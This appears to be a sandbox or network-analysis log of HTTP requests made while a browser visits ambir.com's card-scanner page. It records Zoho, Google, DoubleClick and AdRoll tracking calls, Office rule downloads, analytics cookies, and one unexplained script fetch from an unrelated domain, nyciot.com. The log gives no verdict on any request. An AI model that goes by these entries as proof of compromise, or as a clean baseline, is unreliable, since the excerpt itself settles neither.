      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/search.png HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/search2.png HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/ambir/images/cerrar2.png HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-71030d0b.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /formstatic/fonts?family=Open+Sans:400,700i,700,600i,600,400i,300i,300 HTTP/1.1Host: forms.zohopublic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/10/logo.png HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/css/formsthirdparty.2755260429cd02c98112dac6f4b5b8ce.css HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/css/formslive.717c57bbabd2726cae09dda2681c5aa2.css HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/css/themes/custom.d603ed592e55f07d313b63112b930fbf.css HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /forms/css/themes/media.543197f4ae298f5ded2ac62e00a66656.css HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /forms/css/themes/media/customMedia.bdbbc9b6f964ee4f4c1d1debd83b0068.css HTTP/1.1Host: static.zohocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.zohopublic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: www.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ambir.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /je5vl.js HTTP/1.1Host: nyciot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /j/GXXT3DJJNNBKHGBC62RAND/roundtrip.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-5NGH3KRVGD&gacid=59994235.1732134501&gtm=45be4bj0v9180601725za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102077855~102081485&z=1373063728 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /td/rul/1070729751?random=1732134501018&cv=11&fst=1732134501018&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/10/card-document-scanners_225h.jpg HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/10/logo.png HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
      Source: global trafficHTTP traffic detected: GET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js HTTP/1.1Host: ambir.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga_5NGH3KRVGD=GS1.1.1732134500.1.0.1732134500.60.0.1978750408; _ga=GA1.1.59994235.1732134501; _gcl_au=1.1.1093817975.1732134501
